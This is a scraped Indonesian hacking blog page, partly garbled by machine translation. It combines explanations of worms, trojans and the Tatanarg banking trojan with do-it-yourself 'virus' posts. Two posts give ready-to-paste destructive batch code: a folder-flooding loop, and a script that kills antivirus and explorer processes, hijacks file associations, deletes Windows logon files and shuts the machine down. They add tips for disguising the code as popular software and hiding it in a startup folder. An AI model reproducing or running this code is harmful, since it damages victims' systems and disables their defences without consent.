Oleh karena itu dikatakan berpikir dua kali sebelum membuka attachment dari pengirim yang tidak dikenal.WORM:Cacing adalah mirip dengan virus dengan desain dan dianggap sebagai sub-kelas dari virus. Worm menyebar dari komputer ke komputer, tapi tidak seperti virus, memiliki kemampuan untuk bepergian tanpa ada tindakan manusia. Sebuah worm mengambil keuntungan dari file atau fitur transportasi informasi pada sistem Anda, yang adalah apa yang memungkinkan untuk melakukan perjalanan tanpa bantuan.Bahaya terbesar dengan cacing adalah kemampuan untuk mereplikasi dirinya sendiri pada sistem Anda, sehingga bukan komputer Anda mengirimkan worm tunggal, bisa mengirimkan ratusan atau ribuan salinan dirinya, menciptakan efek menghancurkan yang besar. Salah satu contoh akan untuk cacing untuk mengirimkan salinan dari dirinya ke semua orang yang tercantum dalam e-mail buku alamat Anda. Kemudian, worm ulangan dan mengirimkan dirinya keluar ke semua orang yang tercantum di setiap buku alamat penerima, dan memanifestasikan terus di bawah garis. Karena menyalin dan kemampuan perjalanan cacing di seluruh jaringan, mereka mengkonsumsi banyak memori sistem atau bandwidth jaringan menyebabkan Web server, server jaringan dan komputer individu untuk berhenti merespons. Sebagai contoh adalah cacing Stuxnet, baru-baru dikenal sebagai virus yang paling berbahaya dalam sejarah dunia maya, akan menyajikan dokumentasi yang sempurna tentang hal ini segera.

 BLASTER dan Mydoom belum lagi cacing populer.TROJAN:Trojan muncul sebagai jika yang perangkat lunak kebutuhan tetapi sebenarnya penuh tipu daya. Orang-orang berpikir persis nya aplikasi yang mereka butuhkan dan saat mereka menginstal aplikasi, trojan diam-diam terinstal juga. Lalu trojan ini menunggu untuk beberapa proses aktivasi dan secepat itu akan diaktifkan, mereka menghasilkan hasil yang bervariasi. Mereka mungkin menghapus file Anda saat Anda sedang sibuk bermain game pc. Mereka mungkin mengubah desktop Anda tanpa konsultasi Anda. Mereka mungkin menambahkan ikon desktop namun lebih konyol pada desktop. Mereka dikenal untuk membuat backdoor pada komputer Anda yang memberikan akses ke file penting dalam sistem Anda untuk penyerang. NetBus adalah sebuah trojan populer yang diam-diam menginstal sendiri pada sistem anda dan memberikan kontrol pada sisi penyerang, yang diam-diam memonitor sistem korban. Tidak seperti virus dan worm, Trojan tidak mereproduksi dengan menginfeksi file lain juga tidak mereplikasi diri. Untuk misalnya: ZEUS.
Read More »

0 Folder dalam folder ... menciptakan virus file batch sederhana ...

05.38 Under From Unknown
[0 Comment]


File batch adalah cara paling sederhana untuk menciptakan virus yang lebih sederhana, yang mungkin bervariasi dalam efek mereka tergantung pada kompleksitas dalam kode. Ini mungkin crash sistem operasi Anda, menghapus file sistem penting atau bahkan format hard drive Anda tanpa persetujuan pengguna. Berikut ini adalah langkah-langkah untuk membuat virus file batch sederhana:

1.Open notepad dan ketik kode follwing:

: 435
md d
cd d
goto: 435

2.Save seperti virus.bat pada desktop.

Virus 3.Your siap, cukup klik ganda pada itu untuk memeriksa apa yang terjadi.

Kemajuan lebih lanjut 4.Untuk di dalamnya, download kelelawar untuk konverter exe, melalui itu mengubah ikon, sifat dan judul dari file kelelawar ke setiap perangkat lunak populer.

5.And sekarang virus Anda siap untuk dieksekusi.

Untuk menakut-nakuti teman-teman Anda, hanya menempatkan batch file ini dalam folder startup nya / pc nya.
Read More »

0 Tatanarg, the banking trojan… Beware!

05.37 Under From Unknown
[0 Comment]


Just yesterday, I came across the activity of a trojan names as Tatanarg. The trojan is so very cleverly designed to work that it is hardly possible for any media to detect its activity. It hijacks the SSL connection between the browser and the online banking sites, blocking the client antivirus notifications and uninstalling any other banking trojans present.
Lets quickly figure out how everything works out for the attacker:
Suppose the victim opens a secured online banking website. Assuming that the trojan is present there, the trojan injects an html code into the login page (Man In The Browser Attack). As I said earlier, it disables the antivirus notifications and kills other banking trojans if present in the victim’s computer. You may recall Trojan.Spyeye also had a functionality to kill Zeus Trojans.
Now that the trojan is done with the first part of its job, it starts acting as the proxy between the client browser and the banking site. The moment the user enters the login details and clicks on login button, the secured SSL connection gets set up between the client and the banking website, which sends its certificate and the public key signed by that certificate to the browser for encrypting the data to be sent. But this certificate actually gets hijacked by the trojan and it sends another self signed fake certificate to the victim’s browser along with some rogue public key, successfully passing the certificate verification issue. The victim details get encrypted by that fake public key, gets decrypted by the trojan instantly (as its still acting as an intermediate proxy).Hence the trojan gets to know the actual data that was being transmitted, which later forwards the message to the attacker.
Tatanarg banking trojan
The victim still feels that he is secure, as he can see the https prefix in the address bar, indicating a secured SSL connection. Just last week, Trusteer reported about a trojan dubbed OddJob which forces browsers to keep sessions open after users think they successfully logged out.

Tatanarg trojan also creates a backdoor to Windows Remote Access, keeps the attacker updated of the victim activities. The trojan is in action, so better beware before you get screwed.
Prevention: Keep your antivirus programs up to date to ensure you have the latest protection available. Also, if possible, online banking should be performed from a dedicated computer or a live cd.
Read More »

0 virus jadi jadian

05.37 Under From Unknown
[0 Comment]

Ini virus jadi-jadian yang paling OK tinggal download di sini, unzip, buat shortcutnya di desktop dan ganti iconnya denganicon aplikasi yang sering digunakan misalnya browser, winamp, WMP, YM dll. Virus ini nggak bisa di stop namun akan berhenti sendiri setelah beberapa menit.

Enjoy……
Read More »

0 cara sederhana membuat virus komputer

05.35 Under From Unknown
[0 Comment]



Virus komputer adalah sebuah program komputer yang dapat menyalin sendiri atau menggandakan dirinya sendiri dan menginfeksi system komputer yang secara umum bersifat merusak. Tetapi, taukah kamu bahwa virus komputer itu dapat dibuat secara sederhana, tulisan dibawah ini merupakan salah satu cara membuat virus komputer dengan cara yang sangat sederhana. Tetapi sebelum kamu membaca dan mempraktekkan tulisan tersebut perlu dipahami bahwa postingan ini hanya bersifat menambah pengetahuan kamu bukan sebagai hal yang berdampak negatif dan apapun yang terjadi setelah mempraktekkan tulisan dibawah ini, saya terlepas dari dampak yang terjadi..
Mudah cara untuk membuat kode Virus

Virus ini dapat menyerang:
1. Menhapus, NAVAPSVC.exe
2. Menhapus, Explorer.exe (taskbar dan ikon akan hilang)
3. Menhapus, zonelabs.exe
4. mengubah asosiasi file exe menjadi txt (ketika membuka file exe, akan pergi ke notepad)
5. mengubah asosiasi file txt menjadi mp3 (ketika membuka file txt, maka akan terbuka WinAmp atau multimedia player)
6. Menghapus Login / Logoff Screens

Hanya Copy kode di bawah ini lalu paste Pada Notepad:

title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

Simpan di C: dengan nama installhack.bat
Selesai
Read More »